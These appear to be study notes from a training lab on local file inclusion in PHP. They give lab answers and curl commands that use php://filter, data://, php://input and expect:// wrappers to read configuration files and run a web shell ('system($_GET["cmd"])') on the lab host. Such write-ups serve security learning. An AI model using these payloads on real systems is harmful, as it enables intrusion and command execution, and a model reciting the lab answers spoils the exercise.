Questions

Using the file inclusion find the name of a user on the system that starts with "b".

barry

Submit the contents of the flag.txt file located in the /usr/share/flags directory.

The above web application employs more than one filter to avoid LFI exploitation. Try to bypass these filters to read /flag.txt

File Disclosure via PHP filters

To check for PHP configurations at /etc/php/X.Y/apache2/php.ini for Apache and /etc/php/X.Y/fpm/php.ini for Nginx.

curl "http://159.65.95.114:31474/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

echo 'W1BIUF0KCjs7Ozs7Ozs7O...SNIP...4KO2ZmaS5wcmVsb2FkPQo=' | base64 -d | grep allow_url_include
or decode in base64 decoder and search for allow_url_include
allow_url_include = On

RCE with allow-url_include On:

Data Wrapper method:

Payload:data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id

Go to burpsuite, and enter the payload in LFI parameter lang

Input method:

curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://159.65.95.114:31474/index.php?language=php://input&cmd=id" | grep uid

uid=33(www-data) gid=33(www-data) groups=33(www-data)

Expect method:

Grep for expect after finding out php.ini source code

extension=expect

curl -s "http://159.65.95.114:31474/index.php?language=expect://id"

PreviousFile InclusionNextNotes

Last updated